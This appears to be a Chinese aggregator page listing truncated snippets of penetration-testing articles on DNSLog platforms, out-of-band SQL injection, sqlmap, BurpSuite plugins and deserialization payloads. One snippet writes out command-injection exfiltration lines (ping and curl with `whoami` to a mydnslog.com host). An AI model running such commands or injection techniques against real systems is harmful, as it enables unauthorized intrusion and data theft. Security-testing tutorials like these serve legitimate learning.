01前言Antenna项目:https://github.com/wuba/Antenna使用文档:http://blog.antenna.cool/docs/introAntenna当前已经提供了白...
关于Antenna的隐匿性部署
01前言Antenna项目:https://github.com/wuba/Antenna使用文档:http://blog.antenna.cool/docs/introAntenna当前已经提供了白...
【渗透测试】MSSQL盲注实战
0x01 前言 在渗透测试中很多时候会遇到无报错回显的情况,除了一个个猜解以外,还可以结合DNSlog来快速获取数据库信息,本文主要介绍在MSSQL数据库下的DN...
多功能BurpSuite漏洞探测插件—TsojanScan
TsojanScan 一个集成的BurpSuite漏洞探测插件 First 本着市面上各大漏洞探测插件的功能比较单一,因此与TsojanSecTeam成员决定在已有框架的基础上修改并增加常用的漏洞探...
自建DNSLog平台
0x00 前言有时候网上一些常用的DNSLog平台可能会被目标站点黑名单过滤掉,此时就可以自建DNSLog平台来应对这种情况了。0x01 自建DNSLog平台本次使用一个域名的方式来搭建,而非网上大多...
渗透测试-DNSLOG使用技巧
0x01 命令执行场景 Liunx/Unix/Mac OS系统:ping `whoami`.mydnslog.comcurl http://mydnslog.com/`whoami...
实战记录之曲线救国
记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:为了节约时间直接祭出sqlmap,-r x.txt -v 3 ...
利用DNS实现SQL注入带外查询(OOB)
根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inference(经典SQL注入),inband(盲注、推理注入、带内注入)和out-of-band一、什么是OOBout-of-band带...
这个DNSLOG是我见过最好用的
兄弟们,发现一个贼好用的神器。这个DNSLOG是我见过最好用的域名是DDDD.CAM凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑...
使用 Fuzztag 一键爆破反序列化链
背景 Yakit 新增的 Yso-Java-Hack 功能可以让我们生成反序列化利用的 payload ,通过图形化的方式简化了生成 payload 的过程,但发包过程由于需要针对不同的目标...
漏洞探测辅助平台 Cola_Dnslog(v1.3.1)
=================================== 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,...
实战记录之曲线救国
记录一次实战稍曲折拿下目标站点的过程。前期摸点IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:为了节约时间直接祭出sqlmap,-r x.txt -v 3 ...
16